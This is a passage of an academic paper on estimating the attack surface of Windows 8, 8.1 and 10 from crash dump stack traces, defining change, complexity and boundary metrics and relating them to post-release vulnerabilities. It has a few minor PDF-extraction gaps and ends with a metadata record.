the reviewer should be aware of. Further, their approach to measuring attack surfaces required expert judgment and manual effort. Later, Younis et al. [10] analyzed the relationship between the attack surface of Apache HTTP Server and the density of vulnerabilities in the system. Munaiah et al. [4] used call graphs to determine the proximity of security vulnerabilities to the attack surface of the software system, and found that vulnerabilities tended to cluster near areas of the call graph considered on the attack surface of the system. Younis et al. [11] used reachability analysis alongside entry points to determine how exploitable specific vulnerabilities were, combining the concepts above. Theisen et al. [3] developed Risk-Based Attack Surface Approximation (RASA), which uses crash dump stack traces to estimate the attack surface of a target system. ### 2.2. Exploiting Stack Traces The use of crash reporting systems, including stack traces from the crashes, is becoming a standard industry --- practice\textsuperscript{2} [12, 13]. Bug reports contain information to help engineers replicate and locate software defects. Liblit and Aiken [14] introduced a technique automatically reconstructing complete execution paths using stack traces and execution profiles. Later, Manevich et al. [15] added data flow analysis information on Liblit and Aiken’s approach. Other studies use stack traces to localize the exact fault location [12, 16, 17]. Lately, an increasing number of empirical studies use bug reports and crash reports to cluster bug reports according to their similarity and diversity, e.g. Podgurski et al. [18] were among the first to take this approach. Other studies followed [13, 19]. Not all crash reports are precise enough to allow for this clustering. Guo et al. [20] used crash report information to predict which bugs will get fixed. Bettenburg et al. [21] assessed the quality of bug reports to suggest better and more accurate information helping developers to fix the bug. Crash dump stack traces have been used as an empirical metric for localizing security vulnerabilities. Theisen et al. [3] used crash dump stack traces from Windows to generate an approximation of the attack surface of Windows, called a risk-based attack surface approximation. In that study, 48.4% of binaries appeared on at least one crash dump stack trace, while 94.8% of post-release vulnerabilities were fixed in that 48.4% subset of binaries. Their result allows security professionals to prioritize security efforts somewhat, but half of the binaries in a software system is not a practical reduction in review for many software teams. 2.3. Security Vulnerabilities With respect to vulnerabilities, Huang et al. [22] used crash reports to generate new exploits while Holler et al. [23] used historic crashes reports to mutate corresponding input data to find incomplete fixes. Kim et al. [24] analyzed security bug reports to predict “top crashes”—those few crashes that account for the majority of crash reports—before new software releases. Massacci et al. [25] provided suggestions on how to select good systems for studies about vulnerabilities. Meneely et al. [26] explored how Linus’s law affected the generation of security vulnerabilities, and found correlations between more authors of a piece of code and an increase in vulnerabilities in that code. Meneely et al. [27] later strengthen this evidence by confirming the result for additional sources. A variety of research has been focused on using various properties of software to target vulnerable code. scandario and Text mining techniques to predict vulnerable components. RASA also uses text mining techniques, specifically to parse crash dump stack traces to gain insights. Smith et al. [29] used SQL hotspots as a heuristic for identifying vulnerabilities. Theisen et al. [3] used crash dump stack traces as a heuristic for localizing security vulnerabilities. Based on the corpus of research in this area, we believe that using empirical software measurements and heuristics is a promising direction for research for prioritizing code with security vulnerabilities. Making economically informed decisions on where security vulnerabilities might be could save organizations critical security effort man-hours and resources while finding vulnerabilities before they effect end users. 3. Risk-Based Attack Surface Approximation Theisen et al. [3] developed RASA, which uses crash dump stack traces to estimate the attack surface of a target system. Stack traces from crash dumps represent user activity that put the system into an unexpected state. As indicated by prior research outlined in section 2.1, researchers have focused on the edge of systems when computing the attack surface. Computing the entire attack surface of a target system is labor-intensive. By using empirical metrics for approximation, RASA is able to measure the entire attack surface of the target system. To compute the RASA approach for a target system, a collection of stack traces from crash dumps are collected from the software system we are analyzing. These stack traces are chosen from a set period of time. For each individual stack trace pulled from a crash dump, we isolate the binary, file, or function on each line of each stack trace, and record what code artifact was seen and how many times it has been seen in a stack trace. Each of the code artifacts from stack traces should then be mapped to a code artifact in the system. For example, if the file foo.cpp appears in a stack trace, the matching foo.cpp in system should be identified. A software system may have multiple foo.cpp files, so a method for identifying which foo.cpp was in the crash is required. A list of code artifacts in a software system could come from toolsets provided by the company maintaining the system or pulled directly from source control, in the case of open source projects. Next, RASA parses each individual stack trace in the dataset, and sequentially extracts the individual code artifacts that appear on each line of the trace. To tie stack trace appearances to the codebase, RASA gener- Formalizing a database schema for the storage of stack traces from the target software system is the next step for an experimental setup, as proper indexes on these tables can then be created for faster queries and faster experimentation. The full database diagram for our collection of crash dump stack traces can be seen in Figure 2. The starting point for the database design is the “StackTraces” table, which contains all of the stack traces that are collected for these experiments. One individual record in the “StackTraces” table represents a single line of a single stack trace, with individual stack traces having a unique “stack_threat_id.” As an example, an individual stack trace with 22 lines in it would have 22 records in “StackTraces”, with a unique “stack_id” for each line and a single “stack_threat_id” for the 22 records. Crashes can contain multiple stack traces from different threads that are running at the time of the crash, so each stack trace record is mapped to a specific crash, organized in the “Crashes” table. Having separate tables for crashes and stack traces allows users to look for potential correlations with stack trace types that frequently appear together in the same crash. Each “Crashes” record is mapped to a specific version of Windows, itemized in the “Products” table. For both the “StackTraces” to “Crashes” mapping and the “Crashes” to “Products” mapping, a matching “Crashes” record or “Products” record must be assigned for a new “StackTraces” or “Crashes” record to be created. Because of this, we add each crash to the database first, then add the associated stack traces to the database. In addition to mapping stack traces and crashes to specific products, we also map individual code artifacts at the binary, file, and function level to specific artifacts in versions found in the “Products” table. Each level of granularity of code artifacts has its own associated table: “Binaries”, “Files” and “Functions”, respectively. Each of these artifacts is given its own unique identifier and is mapped to a specific version of Windows in the “Products” table. Similar to the “Crashes” mapping for the “StackTraces” table, new stack traces placed into “StackTraces” must have a valid entry in the “Binaries”, “Files”, and “Functions” tables. This mapping is performed by using string parsing to determine what the correct name is for each line in the stack trace. While mapping binary names to binaries is straightforward, as binaries must have unique names, mapping file and function names from stack trace entries to files and functions in the target system is more difficult, due to the duplication of names of files and functions. To circumvent issues with mapping file and function names... To their place in the system, we map code names in the following order: first binaries, then files, then functions. In this way, we can use the higher-level association to help our mapping technique in subsequent steps. This extra mapping step is assisted by the “BinaryFileMap” and “FunctionMap” tables. In the “BinaryFileMap” table, we associate specific “rp_id” (an internal convention to uniquely identify files in the Windows products) with specific “binary_id” entries. In the case of a file name that is not unique, we use the “BinaryFileMap” information to determine which unique file is being referenced. Similarly, for functions, we associate specific “function_id” entries to the “binary_id” and “rp_id” that the function is contained in. By performing function mapping last, we can use the previously parsed binary and file data for a specific stack trace record to determine which specific function is being referenced by the stack trace. In the case where we are unable to perform this mapping, each table has an “Unknown” record that these failed mapping are placed in, which satisfies the database schema. Each level of granularity has a frequency table, specified as “BinaryFrequency”, “FileFrequency”, and “FunctionFrequency.” Each table has a unique entry for each code artifact for each product. For each record, we then track three different values, used in our later metric generation step. “Edge_count” tracks how many unique incoming and outgoing edges a specific instance of a code artifact has in a list. For example, if “foo.cpp” has 5 unique ways to call into a file, then “edge_count” would have a value of 5 for the incoming entry in the list. “Crash_count” tracks how many times a code artifact appears in a unique crash. For our “foo.cpp” example, appearing in 8 different crashes would mean the “crash_count” value would be set to 8. Note that this is unique occurrences on crashes; if “foo.cpp” appears 6 times in a single crash, it would only contribute one additional occurrence of “foo.cpp” to the “crash_count” entry. Finally, “stackLine_count” is a count of the total number of times a code artifact appears in our datasets, with multiple occurrences in the same crash adding multiple entries. In our previous example of 6 occurrences of “foo.cpp” in a single crash, that would result in adding 6 to the “stackLine_count” entry for “foo.cpp.” Finally, we map security bug information to specific code artifacts found during our parsing of crash dump stack traces. We collected security bug information at the file level, and map the bug information to the “Files” table directly, along with the product the bug was found in via the “Products” table. Individual bugs are also defined as pre-release or post-release, depending on when the bug was found during the development process. Pre-release is defined as bugs found in code before its official release to customers, where official does not include customer alpha or beta releases. Post-release is defined as bugs found in code after an official release. We use post-release bugs as our vulnerabilities for the rest of this study. Using the “BinaryFileMap” and “FunctionMap” tables described previously, we can map individual security bugs to binaries and functions in addition to the direct mapping we have to files. Mapping security bugs to specific code artifacts gives us a goodness measure for the use of crash dump stack traces, where better coverage of post release vulnerabilities means that our approach is performing better. 5. Attack Surface Metrics While a measure of the code that could potentially contain vulnerabilities could be a useful metric for developers, we also explore additional types of metrics that could be gathered from crash dump stack traces. We define three new metrics identified from crash dump stack traces that software developers could use to improve maintenance efforts in codebases: change, complexity, and boundary metrics. All of the metrics can be measured at any of three levels of granularity (binary, file and function), depending on need. Stack traces from crash dumps typically contain at least one of these levels of granularity. 5.1. Change Metric Determining how software systems change over time is important for security professionals, as many security vulnerabilities are introduced as software changes. As new features are added by engineers to satisfy new requirements, vulnerabilities could be introduced alongside those new features, unbeknownst to the developers. While security reviewers could catch many potential vulnerabilities as these changes are flagged and inspected in source control systems, this process is still a very manual one for many organizations. For example, a common workflow for many organizations is to have developers flag changes they make as potentially security relevant, so security teams can then review the code. However, developers may not realize that a change they are making has security implications, as many developers have no background in security work. Therefore, introducing methods for automatic review of potential security issues would be desirable. To that end, change metrics represent how much the crash data has changed between two approximations. Determining what binaries, files, and functions have changed from version to version will help security professionals focus efforts on code that has been newly introduced to the attack surface of a software system. Code that is newly appearing on the attack surface will typically have not been reviewed as stringently by the security team, if it was reviewed by the security team at all. Future iterations of this metric could include month to month changes as well, with the inclusion of dates on specific crashes. We track the amount of code that appears in different versions of Windows to calculate our change metrics. Our three metrics are defined as follows: First Only (FO), is defined as the code artifacts that only appear in the earlier (older version, previous time period) part of the comparison, and is expressed in equation 3: Second Only (SO), is defined as the code artifacts that only appear in the later (newer version, next time period) part of the comparison, and is expressed in equation 4: \[ SO = \text{code in second part of comparison} \] In Both (IB), is defined as the code artifacts that appear in the both parts of the comparison, and is expressed in equation 5: \[ IB = \text{code in both parts of comparison} \] These metrics are generated using data from the appropriate time and version of the target software system. For example, if you wanted to compare the attack surface of a system in Windows 8 versus Windows 8.1, you would collect crash dump stack traces from those two versions, create RASA for both, and compare the results using the above metrics. A similar approach is used to compare different time periods for products under development, such as 2014 and 2015 for Windows 10. 5.2. Complexity Metric Not only do stack traces contain the individual code artifacts that appeared in a crash, they also preserve the order in which that code was accessed leading up to the crash. This order can indicate the complexity of individual code artifacts that appear in failure cases of the software. We can determine, for specific code artifacts, how many different code entities immediately proceed that entity in crashes, and how many code entities immediately follow that entity in crashes. The count of how many different code entities immediately proceed a code entity in crashes is referred to as a “fan-in measure,” while the count of how many code entities immediately follow a code entity in crashes is referred to as a “fan-out measure.” Using these “fan-in” and “fan-out” measures as a measure of the complexity of specific code artifacts could be useful for software developers to identify points of failure in the software system. Additionally, these measures of complexity could be used to provide an estimation of the overall impact of specific security vulnerabilities. Code artifacts with higher “fan-in” and “fan-out” values may need to be prioritized for vulnerability fixes, as the greater span of possible flows through that code artifacts could indicate vulnerabilities with more severe consequences for the software system. Therefore, the complexity metric is based on the fan-in and fan-out measures for a code entity. As an example, if binaries X, Y, and Z appear directly after binary A in stack traces, binary A therefore has three “outgoing” edges. The frequency in which a specific entity appears after another can also be measured. We report the ratio of the number of times each permutation of complexity appears in the codebase, and how many of those complexity types have security vulnerabilities associated with them. As an example, if one complexity type has 100 occurrences, and there are 30 vulnerabilities in those occurrences, then we claim that complexity type has a 30% rate of vulnerability. These ratios are defined in two metrics, Shape Fanning (SF) and Vulnerability Fanning (VF). For SF, we use the number of incoming and outgoing calls from a code artifact as inputs for the calculation of the metric. These inputs are defined as FanIn and FanOut, respectively, and are measured via the code at immediately precedes and follows an entity in crash dump stack traces. For SF, we calculate individual values for each permutation of FanIn and FanOut values, as seen in equation 3: \[ SF(X,Y) = \frac{\text{artifacts with } X \text{ FanIn and } Y \text{ FanOut}}{\text{total number of code artifacts}} \] For VF, we calculate individual values for each permutation of FanIn and FanOut values, as seen in equation 4: \[ VF(X,Y) = \frac{\text{vulns with } X \text{ FanIn and } Y \text{ FanOut}}{\text{total number of vulns.}} \] 5.3. Boundary Metric Boundary metrics determine what system-specific entities appear first after outside entities, and which outside entities are seen directly before code entities in the software system under study. This boundary could be useful for determining which code entities to focus hardening and testing efforts on, while the outside list may indicate which third parties are causing the most issues for end users. Determining what outside binaries are seen most frequently in crashes, and how frequently those binaries are associated with security fixes would be a useful metric for software engineers. As an example, if specific outside programs are causing the most issues for a system, then software teams can focus maintenance efforts on those areas. Additionally, the organization can reach out to the developers of those programs to help them make better use of the interfaces provided by the software. Therefore, we measure the amount of vulnerabilities that appear on the boundary of a target system by analyzing crash dump stack traces. We identify the boundary from the stack traces by flagging which binaries are directly related to the target system versus which binaries are external to the system. Typically, the first few binaries in the stack trace will be external, and the trace will eventually change over to system code. We identify the changeover to system binaries, and mark the first occurrence of system code as the boundary. We then calculate our boundary metric, Boundary Vulnerability Rate (BVR), via the following equation: \[ BVR = \frac{\text{vulns. on the boundary of the system}}{\text{total number of vulns.}} \] From this metric, software developers can make data informed decisions on whether to focus maintenance efforts on the boundary of their system, where their code interacts directly with outside developers, or on other sections of the codebase. 6. Case Study Methodology In this section, we present data collection methodology specific to the Windows study performed for this paper. 6.1. Stack Trace Collection and Parsing (RQ1) Each line of a stack trace is organized as follows. The binary is shown at the beginning of the string, followed by a “!” delimiter and the function name. In the square brackets, the full path of the file associated with this binary/function relationship is shown. Not all stack traces will include the name of the source file. Some stack traces may even display anonymous placeholders for functions and binaries, depending on the permissions and ability to identify these details during runtime. For example, Windows stack traces contain no details about artifacts outside Windows, e.g. an external application causing the crash. Each stack trace is parsed and separated into individual artifacts, including binary name, function name, and file name. We then map each of these artifacts to code as they are named in Microsoft’s internal software engineering tools. File information is not always available. In these cases, we make use of software engineering data indicating relationships between binaries, files, and functions to find the missing data if possible. If these symbol tables contain the function name referenced by the stack trace, we pull the corresponding source file onto the attack surface. In case the function name is not unique, e.g. overloading the function in multiple files, we over approximate the attack surface and pull all possible source files onto the attack surface. If no function name can be found, e.g. function not shipped with Windows, we leave the file marked as unknown. Thus, this approach generates an attack surface that approximates reality. Over approximating the attack surface aims for completeness rather than minimization of size. The accuracy of an attack surface depends on the accuracy and completeness of the analyzed crash data. When code is seen in a stack trace, we place information about that code into a database table containing all code on the attack surface approximation. When this code is added to the database, we enter as much information as possible about the line in the stack trace. In some cases, this is just the binary, as the file and function cannot be mapped. Other cases may have the exact file and/or function. We also collect frequency and neighbor metrics for each entity. This data can be used in a variety of helpful ways, particularly in visualizing these relationships in graph format as seen in Figure 1. If data about a level of granularity is missing from the stack trace, this data may be able to be extrapolated from the data that is present. For example, if a file and line number is provided in the stack trace, the binary can be determined by the name of the file and the function can be determined from the line number in the file. When doing mapping from stack traces to actual entities within the system, sometimes mappings are unable to be made. Two examples of this are when errors occur storing the stack trace, such as when the system is under duress, and mismatched names between the report to crash handlers and data about the system. When a mapping is unable to be made, we label that entity as “unknown,” and do not place that entity on the attack surface. For this work, we specifically remove hardware related crashes as errors resulting from such hardware failures do not indicate a potential input vector for potential attackers. The identification of hardware crashes is done by an automated stack trace classification system within Microsoft. Code that is inaccessible by user activity cannot be manipulated by an attacker, and therefore is not to be on the attack surface. The assumption carries forward when discussing our results below. The ultimate output used by the development and security teams is a classification of whether an entity is on or off the attack surface. This classification can be used for prioritizing defect fixing and validation and verification efforts. 6.2. Data Sources To improve on previous work by researchers [3], larger datasets were required for sufficient samples to work from. The dataset from the summer 2015 work consists of approximately 24.5 million stack traces from 2014 and 2015 from Windows 8, 8.1, and 10, illustrated by Table 1. These crashes represent approximately 500 million records in our database, with a single line in a crash dump represented by a single record. On average, each crash dump has 20 lines or records. Table 1. Number of crash dump stack traces parsed in 2014 and 2015, by OS version. <table> <thead> <tr> <th></th> <th>Windows 8</th> <th>Windows 8.1</th> <th>Windows 10</th> </tr> </thead> <tbody> <tr> <td>2014</td> <td>5 million</td> <td>3.5 million</td> <td>1 million</td> </tr> <tr> <td>2015</td> <td>4 million</td> <td>5.5 million</td> <td>5.5 million</td> </tr> </tbody> </table> Stack traces in Windows typically contain binary/function information, and file information is filled based on a mapping process. In most cases, a single binary/function pair will map to a single file. In the case of multiple mappings, we take the first match. 6.3. Change Metric Generation (RQ2) We calculate the FO, SO, and IB metrics for three different comparisons: Windows 8 to 8.1, Windows 8.1 to 10, and Windows 10 (2014) to 10 (2015). The first two comparisons represent how the attack surface of Windows, as calculated by RASA, changes across major version updates. The Windows 10 (2014) to 10 (2015) comparison represents how the attack surface of Windows, as calculated by RASA, changes while a product is under development. We report both the number of files seen for each metric, along with the percentage of the total files seen across both parts of the comparison that fall into each of the three metrics. While we cannot report what specific binaries, files, and functions were removed from RASA and added to RASA, this data would be available to Windows security team members to make informed decisions on what code to add to regular review and what code to remove from regular review. 6.4. Complexity Metric Generation (RQ3) We use the “ShapeEdge” tables from our database to generate our complexity metrics. Using the “edge” entries, we can determine the amount of unique incoming and outgoing calls to a specific code artifact at the binary, file, and function levels of granularity. For each code artifact, we store the unique incoming and outgoing calls into a temporary table, and then determine if there are any post-release security bugs associated with the code artifact in question. If there is at least one security bug, we label that artifact with a 1. After the result table has been generated, it can be used to generate supporting visualizations or charts for developers and managers. Examples could include pivot tables indicating the density of vulnerabilities in combinations of incoming and outgoing calls, heatmaps showing how combinations of incoming and outgoing calls are correlated with vulnerabilities, or the ability to look at specific binaries, files and functions and determine whether the number of incoming and outgoing calls have changed. For this study, we generate a pair of heatmaps displaying all of the permutations of incoming and outgoing calls, and the distribution of each of these permutations throughout the codebase. This type of visualization could be useful for identifying trends in code structure, and if certain structures are more or less likely to have security vulnerabilities. 6.5. Boundary Metric Generation (RQ4) We determine boundary metrics for Windows from what Windows-specific entities appear first after external entities, and which external entities are seen directly before Windows entities. This edge was determined by flagging each individual binary seen in our dataset as “Windows Related” or “Non Windows Related.” For each stack trace, we read each individual line, noting when this flag switched from “Non Windows Related” to “Windows Related” during a crash. This changeover was marked as the “boundary” for each stack trace. After this boundary is set, we can then determine the percentage of vulnerabilities that appear on this boundary. 7. Results In this section, we present the result of our investigation of each research question. 7.1. RQ1: Crash Dump Stack Trace Metric Table 3 contains a summary of the results from running RASA on Windows 8, Windows 8.1, and Windows 10 on a set of crash dump stack traces from 2014 and 2015. We excluded Windows 10 in 2014 due to the small number of crashes available, as Windows 10 was still in development. The table contains the CC and VC metrics, which are the percentage of code in the target software system that appears in at least one stack trace and the percentage of files with security vulnerabilities that appear in at least one stack trace, respectively. 7.2. RQ2: Change Metric Table 4 contains the FO, SO, and IB metrics for our three comparisons. For the Windows 8 to 8.1 and Windows 8.1 to 10 comparisons, we see a significant difference in the files that are covered for each version, with 39% of the code covered changing for 8 to 8.1 and 58.7% of the code covered changing for 8.1 to 10. While the VC metric for each version of Windows is relatively similar, the significant change in code covered indicates that the attack surface of each version of Windows has changed drastically. Windows 10 – 2014 to 2015 represents a software system that is under development. As expected, we see a significant increase in attack surface size, as measured by RASA, from 2014 to 2015. The growth from 2014 to 2015 is expected, as features for Windows 10 were under active development. 7.3. RQ3: Complexity Metric **RQ3:** How are security vulnerabilities correlated with fan-in and fan-out measures of code artifacts? Figures 3 through 8 are heatmaps describing the distribution of the SF and VF metrics for Windows 8, 8.1, and 10. With these two heatmaps, we are looking for the differences in the distribution of files throughout the system compared to the distribution of vulnerabilities throughout the system, based on incoming and outgoing calls. This would be realized on the heatmap by differences in the distribution of the percentages on the chart. Across all three versions of Windows, we very similar profiles of complexity types. All three versions have a cluster of files and vulnerabilities around “simple” files, represented by the darker colors in the top left corner of each of the heatmaps. We also see a “tail” effect in the bottom of the heatmap, with a cluster of complex files and associated vulnerabilities. Finally, each of the three heatmaps has a “valley” between simple and complex files. This indicates that files in Windows tend to be either highly complex or simple, with very little files exhibiting “moderate” complexity. ### Table 3. Percentage of files appearing on crash dump stack traces and vulnerabilities appearing on crash dump stack traces for operating system/year pairings. <table> <thead> <tr> <th>Operating System</th> <th>Year</th> <th>Code Coverage (CC)</th> <th>Vulnerability Coverage (VC)</th> </tr> </thead> <tbody> <tr> <td>Windows 8</td> <td>2014</td> <td>11.0%</td> <td>17.6%</td> </tr> <tr> <td></td> <td>2015</td> <td>11.9%</td> <td>17.8%</td> </tr> <tr> <td>Windows 8.1</td> <td>2014</td> <td>8.1%</td> <td>16.3%</td> </tr> <tr> <td></td> <td>2015</td> <td>10.0%</td> <td>18.1%</td> </tr> <tr> <td>Windows 10</td> <td>2015</td> <td>7.12%</td> <td>12.1%</td> </tr> </tbody> </table> 7.4. RQ4: Boundary Metric **RQ4:** How often are vulnerabilities seen on the entry and exit points of a software system compared to the rest of the codebase? For Windows 8.1 in 2015, we found that the BVD metric indicates that only 4% of the vulnerabilities found and fixed were on the entry and exit points of the system. This result suggests that focusing security hardening and testing efforts on the entry and exit points of Windows would result in most vulnerabilities going unfound. Based on this result, we confirm the importance of “building security in,” as recommended by McGraw [6]. Treating security as a wrapper around a product to be handled by entry and exit points would seem to be a large mistake if applied to Windows, as most bugs are not ultimately fixed there. Considering security at every point of the development process and not something to be added later is more important than ever based on our result. <table> <thead> <tr> <th>Windows</th> <th>Metric</th> <th>Total Files</th> <th>Percentage</th> </tr> </thead> <tbody> <tr> <td>8 to 8.1</td> <td>FO</td> <td>7951</td> <td>23.1%</td> </tr> <tr> <td></td> <td>SO</td> <td>5490</td> <td>15.9%</td> </tr> <tr> <td></td> <td>IB</td> <td>21025</td> <td>61.0%</td> </tr> <tr> <td>8.1 to 10</td> <td>FO</td> <td>13645</td> <td>43.7%</td> </tr> <tr> <td></td> <td>SO</td> <td>4677</td> <td>15.0%</td> </tr> <tr> <td></td> <td>IB</td> <td>12870</td> <td>41.3%</td> </tr> <tr> <td>Windows 10 - 2014 to 2015</td> <td>FO</td> <td>232</td> <td>1.3%</td> </tr> <tr> <td></td> <td>SO</td> <td>15497</td> <td>89.0%</td> </tr> <tr> <td></td> <td>IB</td> <td>1674</td> <td>9.6%</td> </tr> </tbody> </table> 8. Conclusion For RQ1 (How effectively can stack traces to be used to approximate the attack surface of a system?), we replicate the RASA approach for Windows 8, 8.1, and 10 at the file level, improving the granularity, and therefore applicability, of the approach. Further improvements in mapping specific files on crash dump stack traces to files in the system are needed to improve the VC metric. For RQ2 (How does the code that is seen on crash dump stack traces drop off, get added, and stay the same across versions and during development of soft Figure 3. A heatmap of the distribution of files in Windows 8, based on the number of incoming and outgoing calls from a file. Heat numbers are expressed as the percentage of files in Windows 8 with that distribution. Figure 4. A heatmap of the distribution of vulnerabilities in Windows 8, based on the number of incoming and outgoing calls from a file. Heat numbers are expressed as the percentage of vulnerabilities in Windows 8 with that distribution. Figure 5. A heatmap of the distribution of files in Windows 8.1, based on the number of incoming and outgoing calls from a file. Heat numbers are expressed as the percentage of files in Windows 8.1 with that distribution. Figure 6. A heatmap of the distribution of vulnerabilities in Windows 8.1, based on the number of incoming and outgoing calls from a file. Heat numbers are expressed as the percentage of vulnerabilities in Windows 8.1 with that distribution. ware systems?), we see that the attack surface of Windows significantly changes from version to version and year to year. Therefore, security teams should be constantly updating the code they consider riskiest in the system based on the changes made by developers during feature development and bug fixing iterations. For RQ3 (How are security vulnerabilities correlated with fan-in and fan-out measures of code artifacts?), we did not observe a significant positive or negative correlation between complexity of files and vulnerabilities. However, we have made several observations based on our dataset. First, files in Windows tend to be either highly complex or simple, with very few files being moderately complex. Files in Windows could be assigned as either “complex” or “simple,” which would change the approach security professionals take in securing them. Given no other metrics for severity, vulnerabilities that appear in “complex” files are more likely to have wide-reaching impact than vulnerabilities that appear in “simple” files. The complexity of files could be combined with the frequency with which a file crashes to form a severity metric independent of a qualitative analysis, which would allow the initial assignment of severity for a vulnerability to be automatic. While a human should assign the final severity to each vulnerability after inspection, an automatic severity measure based on frequency and severity could help them classify the vulnerability appropriately. For RQ4 (How often are vulnerabilities seen on the entry and exit points of a software system compared to the rest of the codebase?), we see that vulnerabilities were rarely on the edge of the system as compared to the distribution of code throughout Windows 8.1. Focusing security efforts only on entry and exit points would be a mistake, based on this result. Security must be looked at holistically throughout the entire system as vulnerabilities do not seem to concentrate on the edges of the system. Based on our results, we see that the metrics derived from crash dump stack traces by RASA have positive correlations with security vulnerabilities found in codebases. These metrics could be used by practitioners to guide their efforts in finding and fixing potential security vulnerabilities, and in refactoring and maintaining specific parts of their codebases that are potentially susceptible to vulnerability introduction. We see potential in these new stack trace crash dump metrics for new ways to observe and report on the stability and security properties of software systems. 9. Limitations These metrics have only been evaluated for Windows 8, 8.1 and 10. This approach may not be generalized to other systems without similar studies in different do- mains. In the absence of an oracle for the complete attack surface, we cannot assess the completeness of our approximation. Our determination of accuracy currently is based only on known vulnerabilities, which may introduce a bias towards code previously seen to be vulnerable. While this may be a good assumption, further exploration is needed. The set of artifacts set as part of the attack surface is an approximation, and we do not claim to capture all possible vulnerable nodes. Due to code or configuration changes, code that is not on the attack surface may be moved on to the attack surface. However, prioritization of code on the attack surface, using our method or other attack surface identification methods, can be used to reduce security risk. 10. Future Work Further exploration is needed of the use of stack traces from crash dumps as a potential source of new software security and reliability metrics. Stack traces from crash dumps are already collected by many companies, and reusing existing datasets that industry teams already maintain is one potential avenue for providing immediate value to practitioners. One of the issues that should be is the issue of scale with the use of stack traces from crash dumps. Previous studies have focused on large amounts of data, with stack trace counts reaching into the millions for large software systems. How applicable are crash dump stack trace metrics to smaller software systems without that sense of scale? How many stack traces are required before these metrics are accurate and actionable for practitioners? Are millions of stack traces required, or can practitioners use ten thousand or one thousand stack traces to provide meaningful metrics to their teams? We have shown that RASA does change over time and from version to version for the Windows product. However, we have shown this on yearly cycles and major version releases. Looking at code changes from month to month or even week to week and seeing if it provides useful feedback for security professionals would be the next step to explore how effective RASA could be, practically. Changing the version analysis from major version releases to minor changes (such as hotfixes) would also help in this respect. Finally, building practical tools that plug into IDEs would be one way to get information from RASA in front of developers and security professionals. However, surveys and interviews to clarify the work environment of security professionals are needed to determine the best way to integrate new information into security workflows. 11. Acknowledgements The researchers would like to thank team members at Microsoft and Microsoft Research for their invaluable work and feedback on the results found in this paper. We also thank all of the pre-submission readers and reviewers of this paper for their invaluable feedback. 12. References
{"Source-Url": "https://research.csc.ncsu.edu/security/lablet_files/sem_spr17/theisen-manuscript.pdf", "len_cl100k_base": 10162, "olmocr-version": "0.1.53", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 51038, "total-output-tokens": 12244, "length": "2e13", "weborganizer": {"__label__adult": 0.0003769397735595703, "__label__art_design": 0.0002315044403076172, "__label__crime_law": 0.0005288124084472656, "__label__education_jobs": 0.0007443428039550781, "__label__entertainment": 5.364418029785156e-05, "__label__fashion_beauty": 0.00014483928680419922, "__label__finance_business": 0.00023305416107177737, "__label__food_dining": 0.00024044513702392575, "__label__games": 0.0007925033569335938, "__label__hardware": 0.0007801055908203125, "__label__health": 0.0004045963287353515, "__label__history": 0.00017464160919189453, "__label__home_hobbies": 6.860494613647461e-05, "__label__industrial": 0.0002639293670654297, "__label__literature": 0.00023758411407470703, "__label__politics": 0.00019931793212890625, "__label__religion": 0.0002980232238769531, "__label__science_tech": 0.0125732421875, "__label__social_life": 7.617473602294922e-05, "__label__software": 0.007053375244140625, "__label__software_dev": 0.9736328125, "__label__sports_fitness": 0.0002529621124267578, "__label__transportation": 0.000362396240234375, "__label__travel": 0.00014543533325195312}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 53331, 0.03969]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 53331, 0.43736]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 53331, 0.92827]], "google_gemma-3-12b-it_contains_pii": [[0, 4474, false], [4474, 9153, null], [9153, 14300, null], [14300, 17048, null], [17048, 17926, null], [17926, 23145, null], [23145, 28172, null], [28172, 33396, null], [33396, 38085, null], [38085, 42633, null], [42633, 43556, null], [43556, 46322, null], [46322, 50938, null], [50938, 53065, null], [53065, 53331, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4474, true], [4474, 9153, null], [9153, 14300, null], [14300, 17048, null], [17048, 17926, null], [17926, 23145, null], [23145, 28172, null], [28172, 33396, null], [33396, 38085, null], [38085, 42633, null], [42633, 43556, null], [43556, 46322, null], [46322, 50938, null], [50938, 53065, null], [53065, 53331, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 53331, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 53331, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 53331, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 53331, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 53331, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 53331, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 53331, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 53331, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 53331, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 53331, null]], "pdf_page_numbers": [[0, 4474, 1], [4474, 9153, 2], [9153, 14300, 3], [14300, 17048, 4], [17048, 17926, 5], [17926, 23145, 6], [23145, 28172, 7], [28172, 33396, 8], [33396, 38085, 9], [38085, 42633, 10], [42633, 43556, 11], [43556, 46322, 12], [46322, 50938, 13], [50938, 53065, 14], [53065, 53331, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 53331, 0.11957]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
57a64a682cd9c4d074131a3c7b2242b1ce36d53a
